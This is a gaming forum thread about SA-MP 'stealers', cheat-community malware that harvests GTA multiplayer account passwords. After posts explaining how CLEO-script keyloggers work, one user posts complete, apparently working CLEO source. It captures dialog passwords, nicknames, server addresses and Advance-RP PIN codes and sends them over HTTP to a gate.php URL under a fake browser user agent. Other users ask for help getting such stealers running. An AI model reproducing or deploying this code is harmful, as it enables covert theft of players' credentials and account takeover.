SAMP Stealler

inZ

Well-known member
Joined
Apr 6, 2013
Messages
270
Reaction score
1
Can you guys explain what it actually does? :dont_care:
 
Joined
Feb 18, 2005
Messages
2,965
Reaction score
271
inZ link said:
Can you guys explain what it actually does? :dont_care:

When you join a RP server(for these servers are stealer made mostly) a dialog shows up than requires you to type your account password. Once typed cleo sends your NAME/SERVER-IP/PASSWORD to a ftp, and now some people have your sa:mp account password.
 

TheZeRots

Expert
Joined
Dec 21, 2013
Messages
1,247
Reaction score
1
It's a SAMP keylogger.
When SAMP launches gta_sa.exe, that launches ASI loader, which launches CLEO.asi, CLEO.asi loads all .cs files including the keylogger hidden in a CLEO script.
The keylogger records in-game keystrokes and/or text typed in the dialog boxes; gerts your name and server address, and sends that to FTP OR makes an HTML file, sends it to FTP then deletes the file.

However, in the scripts I've seen, aren't there too little arguments; you need server address, username, password and folder at least...?
 

esmer_gm

Active member
Joined
Apr 9, 2013
Messages
135
Reaction score
0
Mr.Ze link said:
[quote author=esmer_gm link=topic=7646.msg48460#msg48460 date=1405627717]
I'm asking just how to put add.php, I have source and can't connect cleo and add.php
Google that :p
[/quote]
I'm trying like 5 days, every fucking time it's same, whole google checked
 

inZ

Well-known member
Joined
Apr 6, 2013
Messages
270
Reaction score
1
ok thanks guys for explaining
"Whole google checked" hahahahaha this sentence made my day it takes year to check whole google  :angry:
 

Harlem

Well-known member
Joined
Apr 2, 2013
Messages
237
Reaction score
0
Bumping an old thread, but i'm interested in this, i get error when using ''key 30@" same shit if i replace it with "0AB0: 30@" does the same shit, gives me the same error. Any ideas? :motherofgod_
 
Joined
Feb 18, 2005
Messages
2,965
Reaction score
271
What error?
Also there are probably more 'key @' to replace with 0AB0.
 

esmer_gm

Active member
Joined
Apr 9, 2013
Messages
135
Reaction score
0
This code is not working, I have one which Iam using 2 months, works perfectly
 

Harlem

Well-known member
Joined
Apr 2, 2013
Messages
237
Reaction score
0
esmer_gm link said:
This code is not working, I have one which Iam using 2 months, works perfectly

Can you provide me with the code? thanks.

springfield link said:
What error?
Also there are probably more 'key @' to replace with 0AB0.

i get directive error when using ''key @'' and same stuff with 0AB0 when theres no more lines with it, mmmm.
 

Harlem

Well-known member
Joined
Apr 2, 2013
Messages
237
Reaction score
0
if someone is still interested in this topic, i found a working one for 0.3z

Code:
{$CLEO}

0000: T.G

const
    URL = "yourURL"
    ADD_URL = "gate.php"
end
call @create_new_thread 1 @Stealer // Create new thread(stealer)
32@ = 0
33@ = 0

repeat 
    wait 400
until 0AFA: is_samp_structures_available

:Main
while true
    wait 0
// MAIN CODE 
if 
33@ = SAMP.Base()
else_jump @miner_83 // 
0A93: end_custom_thread 

:miner_83 //
end

:Stealer
const
    // SAMP Dialog Styles
    DIALOG_STYLE_MSGBOX = 0
    DIALOG_STYLE_INPUT = 1
    DIALOG_STYLE_LIST = 2
    DIALOG_STYLE_PASSWORD = 3
    
    GAMESTATE_CONNECTED = 3
    
    aData = 1@
    size_aData = 2048
    buf = 2@
    format_string = 3@
    
    library_point = 5@
    
    aData_dlgid = 0
    aData_nick = 1
    aData_ip = 2
    aData_sname = 3
    aData_dlgtext = 4
    aData_pincode = 5
end

repeat
    wait 100
until 0AA2: library_point = load_library "wininet.dll"

while true
    wait 0
    0@ = SAMP.GetGamestate()
    if 0@ == GAMESTATE_CONNECTED
    jf continue

    gosub @steal_arp_pincodes // 

    if Samp.IsDialogActive(-1)
    jf continue

    0@ = Samp.GetDialogType()
    if or
        0@ == DIALOG_STYLE_INPUT
        0@ == DIALOG_STYLE_PASSWORD
    jf continue

    alloc aData size_aData
    alloc buf 128
    alloc format_string 257
    0c11: memset aData 0 size_aData
    0c11: memset buf 0 128
    0c11: memset format_string 0 257

    while Samp.IsDialogActive(-1)
        wait 0
        // ---- WRITE DIALOG ID TO ARRAY
        0@ = Samp.GetDialogID()
        format format_string = "%d" 0@   
        0C20: string_array aData element aData_dlgid size 128 = format_string
        // --------------------------------------------------

        // GENERAL INFO: NICK, IP, SERVER NAME
        call @WriteGeneralInfo 3 data aData buf format_string

        // ---- STEAL
        0c11: memset buf 0 128
        while SAMP.IsDialogActive(-1)
            wait 0
            buf = SAMP.GetDialogInputBoxText()
        end
        0C20: string_array aData element aData_dlgtext size 128 = buf 
        // --------------------------------------------------

        wait 0 // %

        0c11: memset format_string 0 257 // clear string
        0085: 4@ = format_string // get start pointer of string
        
        // ---- PREPARING SENDING DATA TO A URL
        call @PreparingGeneralInfo 2 aData format_string ret_to format_string
        
        0C1F: 8@ = string_array aData element aData_dlgid size 128
        format format_string = "&dialog=%s" 8@
        0c17: strlen 8@ format_string
        005a: format_string += 8@
        
        0C1F: 8@ = string_array aData element aData_dlgtext size 128
        call @converter_russian_sym 1 string 8@ to 9@    
        format format_string = "&input=%s" 9@
        free 9@
        // --------------------------------------------------

        0085: format_string = 4@ // GO TO START OF STRING
        
        // ---- SEND DATA TO A URL
        call @SendData 2 str format_string lib library_point
        // --------------------------------------------------
    end
    
    free aData
    free buf
    free format_string  
    4@ = 0  
end

:steal_arp_pincodes
// ADVANCE-RP | STEAL PIN-CODE
0@ = SAMP.Base()
0@ += 0x212A80
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0
0@ += 985
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0

0A8D: 6@ = read_memory 0@ size 4 virtual_protect 0
6@ += 9216

0A90: 7@ = 2048 * 4
005a: 7@ += 6@
0A8D: 7@ = read_memory 7@ size 4 virtual_protect 0
if 7@ > 0
then
    alloc aData size_aData
    alloc buf 128
    alloc format_string 257
    0c11: memset aData 0 size_aData
    0c11: memset buf 0 128
    0c11: memset format_string 0 257
    0085: 4@ = format_string

    12@ = 0
    while true
        wait 0
        for 8@ = 2048 to 2057
            0A90: 7@ = 8@ * 4
            005a: 7@ += 6@
            0A8D: 9@ = read_memory 7@ size 4 virtual_protect 0
            if 9@ > 0
            then
                10@ = 416.0
                11@ = 168.0
    
/*
SIZE BLOCK = 30x30 px.
EMPTY SPACE = 10 px.
----------------------
| 2048 | 2049 | 2050 |
| 2051 | 2052 | 2053 |
| 2054 | 2055 | 2056 |
|      | 2057 |      |
----------------------
*/
    
                if or
                    8@ == 2049
                    8@ == 2052
                    8@ == 2055
                    8@ == 2057
                then 10@ += 40.0
                end
                if or
                    8@ == 2050
                    8@ == 2053
                    8@ == 2056
                then 10@ += 80.0
                end
    
                if 8@ >= 2051
                then
                    11@ += 40.0
                    if 8@ >= 2054
                    then 
                        11@ += 40.0
                        if 8@ == 2057
                        then 11@ += 40.0
                        end
                    end
                end
    
                if call @is_cursor_here 4 sXY 10@ 11@ eXY 29.0 29.0
                then
                    if 0ab0: key 1
                    then
                        while 0ab0: key 1
                            wait 0 
                        end
                        if call @is_cursor_here 4 sXY 10@ 11@ eXY 29.0 29.0
                        then
                            format format_string = "%s" 9@
                            format_string++

                            12@++
                            if 12@ >= 4
                            then
                                0085: format_string = 4@
                                0C20: string_array aData element aData_pincode size 128 = format_string
                                0c11: memset format_string 0 257 // clear string
                            
                                call @WriteGeneralInfo 3 data aData buf format_string
                                0c11: memset format_string 0 257 // clear string

                                // ---- PREPARING SENDING DATA TO A URL
                                call @PreparingGeneralInfo 2 aData format_string ret_to format_string
                                
                                0C1F: 8@ = string_array aData element aData_pincode size 128   
                                format format_string = "&pincode=%s" 8@
                                0c17: strlen 8@ format_string
                                005a: format_string += 8@
                                
                                if SAMP.IsLocalPlayerSpawned()
                                then format format_string = "&spawned=1"
                                else format format_string = "&spawned=0"
                                end
                                
                                0085: format_string = 4@
                                // --------------------------------------------------
                                          
                                call @SendData 2 format_string lib library_point
                                0c11: memset format_string 0 257
                                
                                12@ = 0
                            end
                        end
                    end
                end
            end
        end
        
        if 9@ <= 0
        then break
        end
    end

    free aData
    free buf
    free format_string  
    4@ = 0  
end
// ---------------------------------------------------------------------------------
return

// ---------------------------------------------
// /////////////////////////////////////////////
// ||||||||||||||||| FUNCTIONS |||||||||||||||||
// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
// ---------------------------------------------
:WriteGeneralInfo
// ---- WRITE NICKNAME TO ARRAY
3@ = SAMP.GetSAMPPlayerIDByActorHandle($PLAYER_ACTOR)
3@ = SAMP.GetPlayerNickname(3@)
0C20: string_array 0@ element aData_nick size 128 = 3@
// --------------------------------------------------

// ---- WRITE IP:PORT TO ARRAY
SAMP.GetCurrentServerAddress(1@, 3@) 
format 2@ = "%s:%d" 1@ 3@   
0C20: string_array 0@ element aData_ip size 128 = 2@
// --------------------------------------------------

// ---- WRITE SERVER NAME TO ARRAY
1@ = SAMP.GetCurrentServerName()

0C20: string_array 0@ element aData_sname size 128 = 1@
// --------------------------------------------------
ret 0

:PreparingGeneralInfo     
0C1F: 2@ = string_array 0@ element aData_nick size 128
format 1@ = "%s?nick=%s" ADD_URL 2@
0c17: strlen 2@ 1@
005a: 1@ += 2@

0C1F: 2@ = string_array 0@ element aData_ip size 128
format 1@ = "&ip=%s" 2@
0c17: strlen 2@ 1@
005a: 1@ += 2@

0C1F: 2@ = string_array 0@ element aData_sname size 128
call @converter_russian_sym 1 string 2@ to 3@             
format 1@ = "&serv=%s" 3@
free 3@
0c17: strlen 2@ 1@
005a: 1@ += 2@
ret 1 1@

:SendData
// call @SendData 2 str 0@ lib 1@
0AA4: 31@ = get_proc_address "InternetOpenA" library 1@
0AA7: call_function 31@ num_params 5 pop 0 params 0 0 "" 0 "Google Chrome/legend edition 1.2" to 3@
if 3@ <> 0x0
then
    0AA4: 31@ = get_proc_address "InternetConnectA" library 1@
    0AA7: call_function 31@ num_params 8 pop 0 params 0 0 3 0 0 80 URL hInternet 3@ to 4@ // Preparing
    if 4@ <> 0x0
    then
        0AA4: 31@ = get_proc_address "HttpOpenRequestA" library 1@
        0AA7: call_function 31@ num_params 8 pop 0 params 0 0x80400100 "" "" "HTTP/1.1" 0@ "GET" 4@ to 5@ // Create request
        if 5@ <> 0x0
        then
            0AA4: 31@ = get_proc_address "HttpSendRequestA" library 1@
            0AA7: call_function 31@ num_params 5 pop 0 params 0 "" 62 "Content-Type: application/x-www-form-urlencoded; charset=windows-1251" 5@ to 6@ // Send
        end
    end
end

0AA4: 31@ = get_proc_address "InternetCloseHandle" library 1@
0AA7: call_function 31@ num_params 1 pop 0 params 3@ ret_to 30@
0AA7: call_function 31@ num_params 1 pop 0 params 4@ ret_to 30@
0AA7: call_function 31@ num_params 1 pop 0 params 5@ ret_to 30@
ret 0

:converter_russian_sym
const
    _string = 0@
    array_chars = 1@
    lstr = 2@
    size_nstring = 4@
    _nstring = 6@
    p_nstring = 7@
end
var
    _string : int
    lstr : int
    array_chars : int
    _nstring : int
    p_nstring : int
end
// call @converter_russian_sym 1 string 0@ to 6@
0c17: strlen lstr _string
0A90: size_nstring = lstr * 4
alloc _nstring size_nstring
0c11: memset _nstring 0 size_nstring
p_nstring = _nstring

0ac6: lo array_chars @chars
for 3@ = 0 to lstr
    0A8D: 5@ = read_memory _string size 1 virtual_protect 0
    if 5@ <> 0
    jf break

    if and
        5@ > 191
        5@ < 256
    then
        5@ -= 192
        
        0A8E: 5@ = array_chars + 5@
        0A8D: 5@ = read_memory 5@ size 1 virtual_protect 0 
    end
    
    format _nstring = "%02X" 5@

    _nstring += 2
    _string++
end
_nstring = p_nstring
ret 1 _nstring

:chars                               
hex
    C0 C1 C2 C3 C4 C5 C6 C7 C8 C9 CA CB CC CD CE CF D0 D1 D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DD DE DF E0 E1 E2 E3 E4 E5 E6 E7 E8 E9 EA EB EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF 00
end

:create_new_thread
0A9F: 32@ = current_thread_pointer
000A: 32@ += 0x10
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@
0AA7: call_function 0x464C20 num_params 1 pop 1 32@ 33@
005A: 32@ += 0@
000A: 33@ += 0x10
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
000A: 33@ += 0x2C
for 32@ = 0 to 30
    0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
    000A: 33@ += 4
end
0AB2: ret 0

:is_cursor_here
// call @is_cursor_here 4 sXY 0@ 1@ eXY 2@ 3@
0B5E: get_cursor_pos 30@ 31@
0B5F: convert_window_screen_coords 30@ 31@ to_game_screen_coords 4@ 5@
if and
    0025: 4@ > 0@
    0025: 5@ > 1@
then
    005B: 0@ += 2@
    005B: 1@ += 3@
    if and
        0025: 0@ > 4@
        0025: 1@ > 5@
    then ret 0 1
    end
end
0AB2: ret 0

i got a private folder full of this shit from kat.hosting.ru someone released it.
 
Top